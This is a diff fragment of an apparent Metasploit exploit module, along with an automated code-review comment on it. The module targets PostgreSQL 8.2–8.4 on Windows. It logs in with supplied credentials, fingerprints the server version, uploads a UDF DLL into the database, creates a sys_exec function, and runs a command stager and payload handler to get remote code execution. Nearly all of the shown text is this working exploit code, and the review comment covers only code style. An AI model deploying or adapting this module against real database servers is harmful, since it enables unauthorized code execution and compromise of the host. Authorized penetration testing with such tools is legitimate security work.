+ [ 'URL', 'http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf',
+ 'URL', 'http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql' # A litte more specific to PostgreSQL
+ ]
+ ],
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'Automatic', { } ], # Confirmed on XXX
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Apr 10 2009' # Date of Bernardo's BH Europe paper.
+ ))
+ register_options(
+ [
+ OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ])
+ ])
+
+ deregister_options('SQL', 'RETURN_ROWSET')
+ end
+
+ # Buncha stuff to make typing easier.
+ def username; datastore['USERNAME']; end
+ def password; datastore['PASSWORD']; end
+ def database; datastore['DATABASE']; end
+ def verbose; datastore['VERBOSE']; end
+ def rhost; datastore['RHOST']; end
+ def rport; datastore['RPORT']; end
+
+ def execute_command(cmd, opts)
+ postgres_sys_exec(cmd)
+ end
+
+ def exploit
+ version = get_version(username,password,database,verbose)
+ case version
+ when :nocompat; print_error "Authentication successful, but not a compatable version."
+ when :noauth; print_error "Authentication failed."
+ when :noconn; print_error "Connection failed."
+ end
+ return unless version =~ /8\.[234]/
+ print_status "Authentication successful and vulnerable version #{version} on Windows confirmed."
+ tbl,fld,dll,oid = postgres_upload_binary_file(dll_fname(version))
+ unless tbl && fld && dll && oid
+ print_error "Could not upload the UDF DLL"
+ return
+ end
+ print_status "Uploaded #{dll} as OID #{oid} to table #{tbl}(#{fld})"
+ ret_sys_exec = postgres_create_sys_exec(dll)
+ if ret_sys_exec
+ if @postgres_conn
+ execute_cmdstager({:linemax => 1500, :nodelete => true})
+ handler
+ postgres_logout if @postgres_conn
+ else
+ print_error "Lost connection."
+ return
+ end
+ end
+ postgres_logout if @postgres_conn
+ end
+
+ def dll_fname(version)
+ File.join(Msf::Config.install_root,"data","exploits","postgres",version,"lib_postgresqludf_sys.dll")
+ end
+
+ # A shorter version of do_fingerprint from the postgres_version scanner
+ # module, specifically looking for versions that valid targets for this
+ # module.
+ def get_version(user=nil,pass=nil,database=nil,verbose=false)
+ begin
+ msg = "#{rhost}:#{rport} Postgres -"
+ password = pass || postgres_password
+ print_status("Trying username:'#{user}' with password:'#{password}' against #{rhost}:#{rport} on database '#{database}'") if verbose
+ result = postgres_fingerprint(
+ :db => database,
+ :username => user,
+ :password => password
+ )
+ if result[:auth]
+ # So, the only versions we have DLL binaries for are PostgreSQL 8.2, 8.3, and 8.4
+ # This also checks to see if it was compiled with a windows-based compiler --
+ # the stock Postgresql downloads are Visual C++ for 8.4 and 8.3, and GCC for mingw)
+ # Also, the method to write files to disk doesn't appear to work on 9.0, so
+ # tabling that version for now.
+ if result[:auth] =~ /PostgreSQL (8\.[234]).*(Visual C++|mingw|cygwin)/i
+ return $1
+ else
+ print_status "Found #{result[:auth]}"
+ return :nocompat
+ end
+ else
+ return :noauth
+ end
+ rescue Rex::ConnectionError
+ print_error "#{rhost}:#{rport} Connection Error: #{$!}" if datastore['VERBOSE']
+ return :noconn
+ end
+ end
+
+end
+
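Review bot: In `get_version`, `password = pass || postgres_password` introduces a local that shadows the `password` accessor defined earlier in the file, and `msg` is assigned but never read; `pw = pass || postgres_password` (used in the `print_status` and `postgres_fingerprint` calls) and dropping `msg` would remove both. In `exploit`, the `:nocompat`, `:noauth` and `:noconn` branches only print and then rely on `return unless version =~ /8\.[234]/` — `Symbol#=~` returning nil — to bail out; an explicit `return` in each `when` would make the intent obvious. `dll_fname` here repeats, byte for byte, the mixin method of the same name this commit adds to `lib/msf/core/exploit/postgres.rb`, so one copy can go. `get_version` is also the only caller-facing path that reports connection errors, and it does so only when `datastore['VERBOSE']` is set even though the `verbose` parameter already carries that value; using the parameter consistently would avoid the two diverging.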